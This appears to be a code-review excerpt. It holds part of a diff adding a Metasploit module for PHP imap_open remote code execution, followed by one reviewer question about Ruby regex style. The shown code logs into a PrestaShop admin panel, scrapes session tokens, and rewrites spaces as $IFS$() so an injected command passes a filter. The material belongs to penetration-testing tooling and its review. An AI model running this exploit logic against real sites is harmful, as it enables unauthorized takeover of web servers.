modules/exploits/linux/http/php_imap_open_rce.rb

```diff
@@ -0,0 +1,175 @@
+    #final payload can not contain spaces, however $IFS$() will return the space we require
+    command.gsub!(' ', '$IFS$()')
+  end
+
+  def exploit
+    if target.name =~ /prestashop/
+      uri = normalize_uri(target_uri.path)
+      res = send_request_cgi({'uri' => uri})
+      if res && res.code != 301
+        print_error('Admin redirect not found, check URI.  Should be something similar to /admin2769gx8k3')
+        return
+      end
+
+      #There are a bunch of redirects that happen, so we automate going through them to get to the login page.
+      while res.code == 301 || res.code == 302
+        cookie = res.get_cookies
+        uri = res.headers['Location']
+        vprint_status("Redirected to #{uri}")
+        res = send_request_cgi({'uri' => uri})
+      end
+
+      #Tokens are generated for each URL or sub-component, we need valid ones!
+      /.*token=(?<token>\w{32})/ =~ uri
+      /id="redirect" value="(?<redirect>.*)"\/>/ =~ res.body
+      cookie = res.get_cookies
+      vprint_status("Token: #{token} and Login Redirect: #{redirect}")
+      print_status("Logging in with #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
+      res = send_request_cgi(
+        'method' => 'POST',
+        'uri'    => normalize_uri(target_uri.path, 'index.php'),
+        'cookie' => cookie,
+        'vars_post' => {
+          'ajax' => 1,
+          'token' => '',
+          'controller' => 'AdminLogin',
+          'submitLogin' => '1',
+          'passwd' => datastore['PASSWORD'],
+          'email' => datastore['USERNAME'],
+          'redirect' => redirect
+        },
+        'vars_get' => {
+          'rand' => '1542582364810' #not sure if this will hold true forever, I didn't see where it is being generated
+        }
+      )
+      if res && res.body.include?('Invalid password')
+        print_error('Invalid Login')
+        return
+      end
+      vprint_status("Login JSON Response: #{res.body}")
+      uri = JSON.parse(res.body)['redirect']
+      cookie = res.get_cookies
+      print_good('Login Success, loading admin dashboard to pull tokens')
+      res = send_request_cgi({'uri' => uri, 'cookie' => cookie})
+      #print_status(res.code.to_s)
+      #if res.code == 301 || res.code == 302
+      #  print_status("#{res.code} -> #{res.headers['Location']}")
+      #  cookie = res.get_cookies
+      #  uri = res.headers['Location']
+      #  res = send_request_cgi({'uri' => uri, 'cookie' => cookie})
+      #end
+
+      /AdminCustomerThreads&amp;token=(?<token>\w{32})/ =~ res.body
+      vprint_status("Customer Threads Token: #{token}")
+      res = send_request_cgi({
+        'uri' => normalize_uri(target_uri.path, 'index.php'),
+        'cookie' => cookie,
+        'vars_get' => {
+          'controller' => 'AdminCustomerThreads',
+          'token' => token
+        }
+      })
+
+      /form method="post" action="index\.php\?controller=AdminCustomerThreads&amp;token=(?<token>\w{32})/ =~ res.body
```

Comment:
This way of using regular match seems to confuse me, is it better than 
`res.body =~/form method="post" action="index\.php\?controller=AdminCustomerThreads&amp;token=(?<token>\w{32})/ ` ?